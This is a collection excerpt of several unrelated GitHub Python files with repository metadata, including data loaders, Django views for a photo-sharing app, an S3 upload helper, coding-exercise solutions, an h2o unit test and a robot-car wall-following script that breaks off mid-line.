self._set_list_of_df_out_of_excel()\n if self.type_of_file is self.plain_text_csv:\n self.path_to_icon = self.path_to_csv_icon\n self._set_list_of_df_out_of_csv()\n\n def _set_file_name(self):\n head, tail = ntpath.split(self.input_path)\n return tail or ntpath.basename(head)\n\n def _filter_extension_out_of_csv_file_name(self):\n return os.path.splitext(self.file_name)[0]\n\n def _set_list_of_df_out_of_excel(self):\n xl_file = pd.ExcelFile(self.input_path)\n for v in xl_file.sheet_names:\n df = xl_file.parse(v, header=None)\n if not df.empty:\n custom_table_instance = cti.CustomTableInstance(\n df.fillna(0), v, self.file_name)\n self.list_of_custom_table_instances.append(\n custom_table_instance)\n\n def _set_list_of_df_out_of_csv(self):\n df = pd.read_csv(self.input_path, header=None)\n if not df.empty:\n custom_table_instance = cti.CustomTableInstance(\n df.fillna(0),\n self._filter_extension_out_of_csv_file_name(),\n self.file_name)\n self.list_of_custom_table_instances.append(custom_table_instance)\n","repo_name":"alexLX7/DataVisualizer","sub_path":"datavisualizer/models/project_instance.py","file_name":"project_instance.py","file_ext":"py","file_size_in_byte":2118,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"11536007406","text":"import json\nimport re\nimport urllib.request\n\nimport requests\nfrom django.contrib.auth.models import User\nfrom django.core.management.base import BaseCommand\nfrom django.db import IntegrityError\n\nfrom accounts.models import Provider, TERR_LOCAL, TERR_COUNTRY, LegalForm, Consumer\nfrom mes import settings\n\n\nclass Command(BaseCommand):\n help = 'Fetch current status of every user in the system from the external source'\n\n\n\n def handle(self, *args, **options):\n\n for entity in Provider.objects.all().prefetch_related('social_balances'):\n balance = entity.social_balances.all().first()\n if balance and balance.done:\n print(balance.external_id)\n\n report = 'https://madrid.mercadosocial.net/balance/balances_2018/{}.pdf'.format(balance.external_id)\n image = 'https://madrid.mercadosocial.net/balance/img/entidades/{}.jpg'.format(balance.external_id)\n\n try:\n reportFile = urllib.request.urlopen(report)\n with open('{}.pdf'.format(balance.external_id), 'wb') as output:\n output.write(reportFile.read())\n except Exception as e:\n print(e)\n\n try:\n imageFile = urllib.request.urlopen(image)\n with open('{}.jpg'.format(balance.external_id), 'wb') as output:\n output.write(imageFile.read())\n except Exception as e:\n print(e)","repo_name":"Mercado-Social-de-Madrid/gestionMES","sub_path":"accounts/management/commands/download_reports.py","file_name":"download_reports.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"61"} +{"seq_id":"12105329839","text":"#! usr/bin/python3\n# regexStrip.py works like the strip() method by using Regexs\n\n#use match object.start and .end to take substrings of paramStr\n\nimport re\n\ndef regStrip(paramStr, paramReg = r'\\s*'):\n\n frontReg = re.compile('^(' + paramReg + ')*')\n backReg = re.compile('(' + paramReg + ')*$')\n\n frontMo = frontReg.search(paramStr)\n backMo = backReg.search(paramStr)\n\n start = 0\n end = len(paramStr)\n \n if frontMo != None:\n start = frontMo.end()\n \n if backMo != None:\n end = backMo.start()\n \n print('Stripping...')\n newStr = paramStr[start:end]\n print(newStr)\n return newStr\n\nwhile True:\n print('\\nType the original string first, or EXIT to terminate')\n text = input()\n if text == 'EXIT':\n print('Terminating...')\n break\n\n print('''Type the substring that needs to be stripped\nOr [ENTER] to strip whitespace''')\n \n strip = input()\n if strip == '':\n regStrip(text)\n else:\n regStrip(text, strip)\n","repo_name":"ranvit/PythonPractice","sub_path":"regexStrip.py","file_name":"regexStrip.py","file_ext":"py","file_size_in_byte":1014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"21576340885","text":"# -*- coding: utf-8 -*-\nu\"\"\"Joint utils @ utils\n\"\"\"\n\nimport maya.cmds as mc\n\n\ndef listHierarchy(topJoint, withEndJoints=True):\n u\"\"\"List joint hierarchy starting with top joint.\n\n Args:\n topJoint (str): Joint to get listed with its joint hierarchy.\n withEndJoints (bool, optional): List hierarchy including end joints. Defaults to True.\n\n Returns:\n list: Listed joints starting with top joint.\n \"\"\"\n\n listedJoints = mc.listRelatives(topJoint, type=\"joint\", ad=True)\n listedJoints.append(topJoint)\n listedJoints.reverse()\n\n completeJoints = listedJoints[:]\n\n if not withEndJoints:\n completeJoints = [j for j in listedJoints if mc.listRelatives(j, c=1, type=\"joint\")]\n\n return completeJoints","repo_name":"leonardpin-br/procedural_rigging","sub_path":"code/python/src/rigLib/utils/joint.py","file_name":"joint.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"13349234194","text":"import os\nimport sys\n\nsys.path.insert(1, os.path.join(\"..\",\"..\",\"..\"))\nimport h2o\nfrom h2o.estimators.infogram import H2OInfogram\nfrom tests import pyunit_utils\n \ndef test_infogram_german_data():\n \"\"\"\n Simple german data test to check that safe infogram is working:\n 1. it generates the correct lists as Deep's original code. \n 2. when model and infogram parameters are specified, it uses the correct specification.\n :return: \n \"\"\"\n deep_rel = [1.00000000, 0.58302027, 0.43431236, 0.66177924, 0.53677082, 0.25084764, 0.34379833, 0.13251726, \n 0.11473028, 0.09548423, 0.20398740, 0.16432640, 0.06875276, 0.04870468, 0.12573930, 0.01382682, \n 0.04496173, 0.01273963]\n deep_cmi = [0.84946975, 0.73020930, 0.58553936, 0.75780528, 1.00000000, 0.38461582, 0.57575695, 0.30663930, \n 0.07604779, 0.19979514, 0.42293369, 0.20628365, 0.25316918, 0.15096705, 0.24501686, 0.11296778, \n 0.13068605, 0.03841617]\n fr = h2o.import_file(path=pyunit_utils.locate(\"smalldata/admissibleml_test/german_credit.csv\"))\n target = \"BAD\"\n fr[target] = fr[target].asfactor()\n x = fr.names\n x.remove(target)\n x.remove(\"status_gender\")\n x.remove( \"age\")\n infogram_model = H2OInfogram(seed = 12345, protected_columns=[\"status_gender\", \"age\"], top_n_features=50)\n infogram_model.train(x=x, y=target, training_frame=fr)\n\n # make sure our result matches Deep's\n pred_names, rel = infogram_model.get_all_predictor_relevance()\n x, cmi = infogram_model.get_all_predictor_cmi()\n assert deep_rel.sort() == rel.sort(), \"Expected: {0}, actual: {1}\".format(deep_rel, rel)\n assert deep_cmi.sort() == cmi.sort(), \"Expected: {0}, actual: {1}\".format(deep_cmi, cmi)\n\n gbm_params = {'ntrees':3}\n infogram_model_gbm_glm = H2OInfogram(seed = 12345, protected_columns=[\"status_gender\", \"age\"], top_n_features=50, \n algorithm='gbm', algorithm_params=gbm_params)\n infogram_model_gbm_glm.train(x=x, y=target, training_frame=fr)\n x, cmi_gbm_glm = infogram_model_gbm_glm.get_all_predictor_cmi()\n assert abs(cmi_gbm_glm[1]-cmi[1]) > 0.01, \"CMI from infogram model with gbm using different number of trees should\" \\\n \" be different but are not.\"\n \ndef assert_list_frame_equal(cmi, rel, predictor_rel_cmi_frame, tol=1e-6):\n rel_frame = predictor_rel_cmi_frame[3].as_data_frame(use_pandas=False)\n cmi_frame = predictor_rel_cmi_frame[4].as_data_frame(use_pandas=False)\n count = 1\n for one_cmi in cmi:\n assert abs(float(cmi_frame[count][0])-one_cmi) < tol, \"expected: {0}, actual: {1} and they are \" \\\n \"different\".format(float(cmi_frame[count][0]), one_cmi) \n assert abs(float(rel_frame[count][0])-rel[count-1]) < tol, \"expected: {0}, actual: {1} and they are \" \\\n \"different\".format(float(rel_frame[count][0]), rel[count-1])\n count += 1\n\n\nif __name__ == \"__main__\":\n pyunit_utils.standalone_test(test_infogram_german_data)\nelse:\n test_infogram_german_data()\n","repo_name":"h2oai/h2o-3","sub_path":"h2o-py/tests/testdir_algos/infogram/pyunit_PUBDEV_8075_safe_infogram_german_data_infogram_params.py","file_name":"pyunit_PUBDEV_8075_safe_infogram_german_data_infogram_params.py","file_ext":"py","file_size_in_byte":3205,"program_lang":"python","lang":"en","doc_type":"code","stars":6553,"dataset":"github-code","pt":"61"} +{"seq_id":"6183469688","text":"class Solution:\n def threeSum(self, nums):\n length=len(nums)\n ls=[]\n same=[]\n for i in range(length):\n for j in range(i+1,length):\n if 0-nums[i]-nums[j] in nums[j+1:]:\n lst=[nums[i],nums[j],0-nums[i]-nums[j]]\n if set(lst)not in same:\n ls.append(lst)\n same.append(set(lst))\n print(ls)\n \np1=Solution()\nprint(p1.threeSum([-1,0,1,2,-1,-4]))\n","repo_name":"Sheldoer/leetcode_python","sub_path":"015三数之和.py","file_name":"015三数之和.py","file_ext":"py","file_size_in_byte":492,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"43267675123","text":"class Node:\n def __init__(self, val, left=None, right=None):\n self.val = val\n self.left = left\n self.right = right\n\nclass treeToDoublyList:\n def treeToDoublyList(self, root: 'Node') -> 'Node':\n # Time:O(n) number of nodes\n # Space: O(n) best case logn which is height of tree. n is worst case. tree is a list\n # inorder traversal 在BST 的本质就是 以从小到大的顺序浏览整个的tree。 如果想象这个过程其实就是跟从头到尾浏览\n # double linked list 是一样的。 只需要记住第一个和最后一个node 是什么,好让当前的node 和最后一个node 相连接就可以了\n # 第一个node 只起到一个作用就是在最后的时候和最后一个node 连接形成闭环\n def helper(root: 'Node') -> 'Node':\n nonlocal first, last\n if not root:\n return None\n helper(root.left)\n if last:\n last.right = root\n root.left = last\n else:\n first = root\n last = root\n helper(root.right)\n\n if not root:\n return None\n first, last = None, None\n helper(root)\n last.right = first\n first.left = last\n return first","repo_name":"latree/leetcode","sub_path":"Tree/convert_BST_double_Linked_list.py","file_name":"convert_BST_double_Linked_list.py","file_ext":"py","file_size_in_byte":1300,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"30123017018","text":"#!/usr/bin/python3\n'''Lockbox Class'''\n\n\ndef canUnlockAll(boxes):\n '''Unlock Box Method'''\n if type(boxes) is list:\n keys = [0]\n\n for k in keys:\n for x in boxes[k]:\n if x not in keys and x < len(boxes):\n keys.append(x)\n\n if len(keys) == len(boxes):\n return True\n\n else:\n return False\n","repo_name":"Seb1776/holbertonschool-interview","sub_path":"0x00-lockboxes/0-lockboxes.py","file_name":"0-lockboxes.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"32559807386","text":"import os\nimport re\nimport json\n\n# pylint: disable=too-many-branches\n\n\ndef get_old_dic():\n ''' hacky get hardcoded reference dic\n '''\n cache = os.path.join(\n os.path.dirname(\n os.path.abspath(__file__)),\n '..',\n 'cache')\n fname = os.path.join(cache, 'id_reference.json')\n with open(fname) as f:\n old_dic = json.load(f)\n return old_dic\n\n\ndef get_v3_to_v4_annos_dic(details):\n old_dic = get_old_dic()\n all_classes = set([int(r) for r in old_dic])\n\n new_partname2id = {}\n for cat in all_classes:\n new_partname2id[cat] = {\n 'name': old_dic[str(cat)]['name'], 'parts': {}}\n for part in details.getParts(cat=cat):\n new_partname2id[cat]['parts'][part['name']] = part['part_id']\n\n v3_to_v4_convert = {}\n for cat in old_dic:\n cat_id = int(cat)\n v3_to_v4_convert[cat_id] = {}\n parts = old_dic[cat]['parts']\n choices = new_partname2id[cat_id]['parts']\n for part in parts:\n pname = parts[part]\n pname = pname.replace(\"_\", \"\")\n pname = re.sub(r\"\\d\", \"\", pname)\n # For train\n pname = re.sub(\"([hc])(left|right)\", r'\\1leftright', pname)\n if pname in choices:\n v3_to_v4_convert[cat_id][part] = choices[pname]\n continue\n\n # lower/upper legs merged in some (if not already matched)\n pname = re.sub(\"([lr])([fb])([lu])\", r'\\1\\2', pname)\n # Hoofs and paws combined\n pname = re.sub(\"([lr])([fb])([ho]|[pa]){2}\", r'\\1\\2hopa', pname)\n if pname in choices:\n v3_to_v4_convert[cat_id][part] = choices[pname]\n continue\n\n if pname == 'beak':\n if 'muzzle' in choices:\n v3_to_v4_convert[cat_id][part] = choices['muzzle']\n continue\n if 'nose' in choices:\n v3_to_v4_convert[cat_id][part] = choices['nose']\n continue\n elif pname == 'muzzle':\n if 'nose' in choices:\n v3_to_v4_convert[cat_id][part] = choices['nose']\n continue\n if 'beak' in choices:\n v3_to_v4_convert[cat_id][part] = choices['beak']\n continue\n elif pname == 'nose':\n if 'muzzle' in choices:\n v3_to_v4_convert[cat_id][part] = choices['muzzle']\n continue\n if 'beak' in choices:\n v3_to_v4_convert[cat_id][part] = choices['beak']\n continue\n\n if cat_id == 25:\n # bird\n if pname in ['lhorn', 'rhorn', 'lear', 'rear']:\n # there aren't any real \"horns\" on birds - say head\n # hardcoded\n v3_to_v4_convert[cat_id][part] = choices['head']\n continue\n elif pname in ['nose', 'muzzle']:\n v3_to_v4_convert[cat_id][part] = choices['beak']\n continue\n\n elif cat_id == 113:\n # hrose\n if pname == 'beak':\n v3_to_v4_convert[cat_id][part] = choices['muzzle']\n continue\n elif pname == 'lhorn':\n v3_to_v4_convert[cat_id][part] = choices['lear']\n continue\n elif pname == 'rhorn':\n v3_to_v4_convert[cat_id][part] = choices['rear']\n continue\n elif cat_id in [23, 258]:\n # Bike and motorbike\n if pname == 'body':\n v3_to_v4_convert[cat_id][part] = choices['silh']\n continue\n if pname == 'chainwheel':\n v3_to_v4_convert[cat_id][part] = choices['silh']\n continue\n elif cat_id == 427:\n if pname == 'screen':\n v3_to_v4_convert[cat_id][part] = choices['framescreen']\n continue\n elif cat_id == 65:\n if 'horn' in pname:\n v3_to_v4_convert[cat_id][part] = choices[pname[0] + 'ear']\n continue\n return v3_to_v4_convert\n","repo_name":"princetonvisualai/pointingqa","sub_path":"dataset-code/intentqa/ObjPartUI/examples/weak/notebooks/point_analytics/convert_part_ids.py","file_name":"convert_part_ids.py","file_ext":"py","file_size_in_byte":4307,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"61"} +{"seq_id":"42357607834","text":"import io\nimport os\n\nfrom dotenv import load_dotenv\n\nimport boto3\n\nload_dotenv()\n\ns3 = boto3.client(\n \"s3\",\n aws_access_key_id=os.getenv('AWS_ACCESS_KEY_ID'),\n aws_secret_access_key=os.getenv('AWS_SECRET_ACCESS_KEY')\n)\n\n\ndef uploadPILtoBucket(image, filename):\n BUCKET = os.getenv('AWS_BUCKET_NAME')\n ENDPOINT = os.getenv('AWS_DOMAIN')\n\n temp_file = io.BytesIO()\n image.save(temp_file, format=\"JPEG\")\n temp_file.seek(0)\n\n s3.upload_fileobj(\n Fileobj=temp_file,\n Bucket=BUCKET,\n Key=filename,\n ExtraArgs={\"ContentType\": \"image/jpeg\"}\n )\n\n url = s3.generate_presigned_url(\n ClientMethod='get_object',\n Params={'Bucket': BUCKET, 'Key': filename},\n ExpiresIn=172800\n )\n\n return url\n","repo_name":"wongyuhao/MOMO","sub_path":"s3_util.py","file_name":"s3_util.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"20549167202","text":"from typing import Any, Dict, List, Optional\n\nimport altair as alt\nimport deneb as den\nimport pandas as pd\n\n\ndef fig_metric(\n df: pd.DataFrame,\n metric: str,\n title: Optional[str] = None,\n title_dx: int = 0,\n width: Optional[int] = None,\n height: Optional[int] = None,\n labels: bool = True,\n keywords: Dict[str, Any] = {},\n style: Dict[str, Any] = {},\n default_color: str = \"#000000\",\n colors_dict: Dict[str, Any] = {},\n config: Optional[str] = None,\n):\n \"\"\"Plots metrics\n\n Args:\n df: Dataframe which at least has columns `algorithm`, `num_simulations` and\n a column titled accordingly to `metric`.\n metric: Metric to plot, should be a column in `df`.\n title: Title for plot\n title_dx: x-direction offset for title\n labels: Whether to plot labels\n seed: Seed\n width: Width\n height: Height\n default_color: Default color of samples\n colors_dict: Dictionary of colors\n config: Optional string to load predefined config\n style: Optional dictionary for `den.set_style`\n keywords: Optional dictionary passed on to `den.lineplot`\n\n Returns:\n Chart\n\n Note:\n Due to an open issue on vega-lite, it is difficult to sort columns in\n non-alphabetical fashion (i.e., ordered by algorithm name). As a workaround,\n consider prepending an algorithm with a space to have it listed first, e.g.\n `df.loc[df[\"algorithm\"] == \"REJ-ABC\", \"algorithm\"] = \" REJ-ABC\"`.\n See also: https://github.com/vega/vega-lite/issues/5366/\n \"\"\"\n colors = {}\n for algorithm in df.algorithm.unique():\n algorithm_stripped = algorithm.strip()\n if algorithm_stripped not in colors_dict:\n colors[algorithm] = default_color\n else:\n colors[algorithm] = colors_dict[algorithm_stripped]\n\n keywords[\"column_labels\"] = labels\n keywords[\"color\"] = den.colorscale(colors, shorthand=\"algorithm:N\")\n\n x_axis_kwargs = {}\n y_axis_kwargs = {}\n\n if config == \"manuscript\":\n keywords[\"width\"] = 700 / len(df.algorithm.unique()) if width is None else width\n keywords[\"height\"] = 65 if height is None else height\n style[\"font_size\"] = 12\n style[\"font_family\"] = \"Inter\"\n y_axis_kwargs = {\"minExtent\": 60}\n\n if config == \"streamlit\":\n keywords[\"width\"] = None if width is None else width\n keywords[\"height\"] = None if height is None else height\n style[\"font_size\"] = 16\n\n keywords[\"limits\"] = None\n keywords[\"log_y\"] = False\n keywords[\"y_axis\"] = alt.Axis(title=metric)\n\n if \"MMD\" in metric:\n keywords[\"y_axis\"] = alt.Axis(title=\"MMD²\")\n\n if \"C2ST\" in metric:\n keywords[\"limits\"] = [0.5, 1.0]\n\n if metric == \"RT\":\n keywords[\"log_y\"] = True\n keywords[\"limits\"] = [0.001, 1000.0]\n keywords[\"y_axis\"] = alt.Axis(\n values=[0.001, 0.01, 0.1, 0.0, 1.0, 10.0, 100.0, 1000.0]\n )\n\n alt.themes.enable(\"default\")\n\n den.set_style(\n extra={\n \"config\": {\n \"axisX\": {\n \"grid\": False,\n \"labelAngle\": 270,\n \"domain\": False,\n \"domainWidth\": 0,\n \"ticks\": True,\n \"tickWidth\": 0,\n \"minExtent\": 0,\n **x_axis_kwargs,\n },\n \"axisY\": {\n \"domain\": False,\n \"domainWidth\": 0,\n \"ticks\": True,\n \"tickWidth\": 0,\n \"grid\": True,\n \"titlePadding\": 0,\n \"tickCount\": 6.0,\n **y_axis_kwargs,\n },\n }\n },\n **style,\n )\n\n chart = den.lineplot(\n df.sort_values(\"algorithm\"),\n x=\"num_simulations:O\",\n y=f\"{metric}:Q\",\n error_extent=\"ci\",\n column=\"algorithm:N\",\n independent_y=False,\n row_title=\"\",\n column_title=\"Number of Simulations\",\n title_orient=\"bottom\",\n **keywords,\n )\n\n chart = chart.configure_point(size=50).configure_line(size=1.5)\n\n if title is not None:\n chart = chart.properties(title={\"text\": [title]}).configure_title(\n offset=10, orient=\"top\", anchor=\"middle\", dx=title_dx\n )\n\n return chart\n","repo_name":"amortizedgbi/amortizedgbi","sub_path":"packages/sbibm/sbibm/visualisation/metric.py","file_name":"metric.py","file_ext":"py","file_size_in_byte":4414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"38507087911","text":"from django.shortcuts import render, redirect\nimport uuid\nimport boto3\n# from django.db.models import RawSQL\nfrom .models import Photo,Post, Post_User, Photo_User\nfrom django.views.generic import ListView, DetailView, CreateView\n# Add the two imports below\nfrom django.contrib.auth import login, authenticate\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.forms import UserCreationForm\nfrom .forms import SignUpForm\nfrom .forms import PictureForm\nfrom datetime import date\nfrom django.utils import timezone \nfrom django.db import connection\nfrom django.views.decorators.csrf import csrf_exempt\n\nBUCKET = 'furiends'\nS3_BASE_URL = f'https://{BUCKET}.s3.ca-central-1.amazonaws.com'\n\n\ndef home(request, user_id):\n user_instance = User.objects.get(pk=user_id)\n user_pic = None\n picture_form = PictureForm()\n query_photo_like = \"\"\"\n select photo_id, count(photo_id) photo_count from main_app_photo_user group by photo_id\n \"\"\"\n with connection.cursor() as cursor:\n cursor.execute(query_photo_like)\n columns = [col[0] for col in cursor.description]\n photo_like = [dict(zip(columns, row)) for row in cursor.fetchall() ]\n query_comment = \"\"\"\n select mp.id, mp.photo_id, mp.user_id, mp.caption, au.username from main_app_post mp\n left join auth_user au\n on mp.user_id = au.id\n order by mp.photo_id, mp.id desc\n \"\"\"\n with connection.cursor() as cursor:\n cursor.execute(query_comment)\n columns = [col[0] for col in cursor.description]\n comments = [dict(zip(columns, row)) for row in cursor.fetchall() ]\n query_liked = \"\"\"\n select ap.*, pu.user_id liked, au.username from main_app_photo ap\n left join \n (select * from main_app_photo_user where user_id = %s) pu\n on ap.id = pu.photo_id\n left join auth_user au\n on ap.user_id = au.id\n where ap.category = 2\n order by ap.id desc\n \"\"\"\n with connection.cursor() as cursor:\n cursor.execute(query_liked, [user_id])\n columns = [col[0] for col in cursor.description]\n photo = [dict(zip(columns, row)) for row in cursor.fetchall() ]\n \n try:\n user_pic = Photo.objects.filter(user = user_instance, category=1)[0]\n except:\n pass\n like_comment = Photo_User.objects.all()\n try: \n photos_profile = Photo.objects.filter(category=1)\n return render(request, 'home.html', {\n 'picture_form': picture_form, 'user_id': user_id, 'photo': photos_profile, 'posts': photo, 'photo_like': photo_like,\n 'username': user_instance.username, 'user_pic': user_pic, 'comments': comments, 'like_comment': like_comment\n })\n except:\n # print(photos_profile)\n return render(request, 'home.html', {\n 'picture_form': picture_form, 'user_id': user_id, 'posts': photo, 'username': user_instance.username, 'user_pic': user_pic, 'comments': comments})\n\n\ndef PostCreate(request, user_id, photo_id):\n photos = Photo.objects.get(pk=photo_id)\n username = User.objects.get(pk=user_id)\n# user_instance = User.objects.get(pk=user_id)\n# posts = Post.objects.filter(photo=photos).order_by('-id')\n query = \"\"\"\n select mp.*, au.first_name, aa.count total_likes, mapu.post_id like_by_user from main_app_post mp\n left join (\n select post_id, count(post_id) count from main_app_post_user group by post_id\n\t ) aa\n on mp.id = aa.post_id\n left join auth_user au\n\t on mp.user_id = au.id\n left join \n\t (select * from main_app_post_user where user_id = %s) mapu\n\t on mp.id = mapu.post_id\n where mp.photo_id = %s\n order by id desc\n \"\"\"\n with connection.cursor() as cursor:\n cursor.execute(query, [user_id, photo_id])\n columns = [col[0] for col in cursor.description]\n posts = [dict(zip(columns, row)) for row in cursor.fetchall() ]\n return render(request, 'picture_comment.html', {'photos': photos, \n 'user_id': user_id, 'posts':posts, 'photo_id': photo_id, 'username': username})\n\n\ndef create_photo_like(request, user_id, photo_id):\n try:\n Photo_User.objects.get(user_id=user_id, photo_id=photo_id).delete()\n except:\n Photo_User.objects.create(user_id = user_id, photo_id=photo_id)\n return redirect(f\"/home/{user_id}/\")\n\n\ndef delete_photo(request, user_id, photo_id):\n user_instance = User.objects.get(pk=user_id)\n photo_instance = Photo.objects.get(pk=photo_id)\n try: \n for post in Post.objects.filter(photo=photo_instance):\n Post_User.objects.filter(post_id = post.id).delete()\n\n Photo_User.objects.filter(photo_id=photo_id).delete()\n \n Photo.objects.filter(pk=photo_id).delete()\n return redirect(f\"/home/{user_id}/\")\n except:\n return redirect(f\"/home/{user_id}/\")\n\n@csrf_exempt\ndef index(request):\n # category = request.POST.get('category')\n # user_instance = User.objects.get(pk=user_id)\n photos = Photo.objects.all()\n # photos =Photo.objects.filter(category=category, user=user_instance)\n # print(photos.reverse())\n return render(request, \"registration/login.html\", {'photos': photos})\n\n@csrf_exempt\ndef login_auth(request):\n print(request.POST)\n username = request.POST['username']\n password = request.POST['password']\n user_id = User.objects.get(username=username)\n # print(user_id.id)\n user = authenticate(request, username=username, password=password)\n if user is not None:\n return redirect(f'/home/{user_id.id}/')\n # Redirect to a success page.\n else:\n return redirect('/')\n \n# def delete_photo(request, photo_id):\n# Photo.objects.delete(pk=photo_id)\n# return redirect('home.html')\n\ndef PostCreateDelete(request, user_id, post_id, photo_id):\n print(user_id, post_id)\n user_instance = User.objects.get(pk=user_id)\n Post.objects.filter(pk=post_id, user=user_instance).delete()\n try:\n Post_User.objects.filter(user_id=user_id, post_id=post_id).delete()\n return redirect(f\"/post/create/{user_id}/photo/{photo_id}/\")\n except:\n return redirect(f\"/post/create/{user_id}/photo/{photo_id}/\")\n\ndef add_photo(request, user_id):\n photo_file = request.FILES.get('photo-file', None)\n caption = request.POST.get('caption')\n category = request.POST.get('category')\n user_instance = User.objects.get(pk=user_id)\n\n if request.method == 'POST': \n # to remove old profile pic and update it with the new one\n if category == '1':\n print('coming to this')\n Photo.objects.filter(user=user_instance, category=category).delete()\n # for photo upload\n if photo_file:\n s3 = boto3.client('s3')\n key = 'furiends/' + uuid.uuid4().hex[:6] + photo_file.name[photo_file.name.rfind('.'):]\n try:\n s3.upload_fileobj(photo_file, BUCKET, key)\n url = f\"{S3_BASE_URL}/{key}\"\n # print(url)\n # print(user_id) \n user = User.objects.get(pk=user_id)\n # print(user)\n # print(type(date.today()))\n Photo.objects.create(url=url, user=user_instance, caption=caption, likes=0, category=category)\n # print('done')\n except:\n print('An error occurred uploading file to S3')\n return redirect(f'/home/{user_id}/')\n else:\n return redirect(f'/home/{user_id}/')\n\n# Create your views here.\ndef signup(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n raw_password = form.cleaned_data.get('password1')\n user = authenticate(username=username, password=raw_password)\n login(request, user)\n return redirect('/')\n else:\n form = SignUpForm()\n return render(request, 'registration/signup.html', {'form': form})\n\ndef about(request):\n return render(request, 'about.html')\n\ndef my_profile(request, user_id):\n photo = None\n photos = None\n user_instance = User.objects.get(pk=user_id)\n try:\n photo = Photo.objects.filter(user_id=user_instance, category=1)[0]\n except:\n pass\n try:\n photos = Photo.objects.filter(user_id=user_instance, category=2)\n except:\n pass\n \n return render(request, 'my_profile.html', {'user_id': user_id, 'photo': photo, 'photos': photos})\n\ndef post_detail(request, post_id):\n post = Post.objects.get(id=post_id)\n return render(request, 'my_profile/post_detail.html', {'post': post\n })\n\ndef add_picture(request, user):\n form = PictureForm(request.POST)\n if form.is_valid():\n new_picture = form.save(commit=False)\n new_picture.picture_id = user\n new_picture.save()\n return render('home.html')\n\n@csrf_exempt \ndef PostCreateComment(request, user_id, photo_id):\n if request.method == 'POST' and request.POST.get('comment'):\n post = request.POST.get('comment')\n user = User.objects.get(pk=user_id)\n photos = Photo.objects.get(pk=photo_id)\n Post.objects.create(caption=post, likes=0, user=user, photo=photos)\n return redirect(f\"/post/create/{user_id}/photo/{photo_id}/\")\n else:\n return redirect(f\"/post/create/{user_id}/photo/{photo_id}/\")\n \n\ndef Likes_Create_Delete(request, user_id, post_id, photo_id):\n # print(user_id, post_id)\n try:\n Post_User.objects.get(user_id=user_id, post_id=post_id).delete()\n except:\n Post_User.objects.create(user_id = user_id, post_id=post_id)\n return redirect(f\"/post/create/{user_id}/photo/{photo_id}/\")\n\ndef total_likes(request, user_id, post_id, photo_id):\n return redirect(f\"/post/create/{user_id}/photo/{photo_id}/\")\n","repo_name":"jfranzm/Furiends","sub_path":"main_app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":9939,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"40972429927","text":"import threading # Modul threads\nimport time # Modul time\nimport math\nimport statistics\nfrom setup import * # GPIO Setup importieren und ausführen\nfrom abstand import distanz # Funktion für Wandabstandmessen importieren\nfrom aufraeumen import aufraeumen,bremsen,losfahren # Funktion für cleanup() importieren\n\nspeed = 3 # 1 bis 4 (*25) (% Tastverhältnis)\n\n#\ndef forward():\n pr.ChangeDutyCycle(speed*25) # Motor A, 100% Tastverhältnis\n pl.ChangeDutyCycle(speed*25) # Motor B, 100% Tastverhältnis\n return\n# \ndef lenken(steer):\n speedHead = (100-speed*25)/25\n if steer < 1:\n pr.ChangeDutyCycle(((1-steer)*speedHead+speed)*25) # \n pl.ChangeDutyCycle(steer*speed*25) # \n elif steer > 1:\n steer = 2-steer\n pr.ChangeDutyCycle(steer*speed*25) # \n pl.ChangeDutyCycle(((1-steer)*speedHead+speed)*25) # \n return\n\ndef wandfahren(delay, run_event):\n zielAngle = 0\n angle = 0\n zielDist = 30\n steer = 0\n dist = distanz(\"L\")\n lastDist = dist\n vorne = 40 #distanz(\"R\")\n lastVorne = vorne\n lastSteer = 1\n \n print (\"Distanz: \", dist)\n \n while run_event.is_set():\n time.sleep(delay)\n \n lastDist = dist\n dist = statistics.median([distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\"),distanz(\"L\")])\n lastVorne = vorne\n vorne = 40 #distanz(\"R\")\n lastSteer = steer\n\n zielAngle = math.degrees(-math.atan((zielDist-dist)/20)) # Winkel zum ziel-Abstand\n angle = math.degrees(math.atan((lastDist-dist)/10)) # Vermutlicher Winkel des Autos zur Wand\n \n if zielAngle == angle:\n steer = 1\n elif angle < zielAngle:\n diffAngle = angle + zielAngle\n if angle < 0 and zielAngle > 0:\n diffAngle = -(angle - zielAngle)\n diffAngle = 1-diffAngle/90\n steer = diffAngle\n steer = ((angle+90)/(zielAngle+90))**speed\n #steer = 0.5\n elif angle > zielAngle:\n diffAngle = angle + zielAngle\n if angle > 0 and zielAngle < 0:\n diffAngle = zielAngle - angle\n diffAngle = 1-diffAngle/90\n steer = diffAngle\n steer = 2-(((zielAngle+90)/(angle+90))**speed)\n #steer = 1.5\n \n if steer > 2:\n steer = 2\n if steer < 0:\n steer = 0\n \n steer = (lastSteer + steer)/2\n \n print(\" \"*int(dist),\"█\",\" \"*int(70-dist),\"d = %.1f cm\" % dist,\";s = %.2f\" % steer,\";a = %.1f°\" % angle,\";z = %.1f°\" % zielAngle,\";d = %.1f°\" % diffAngle)\n print(\" 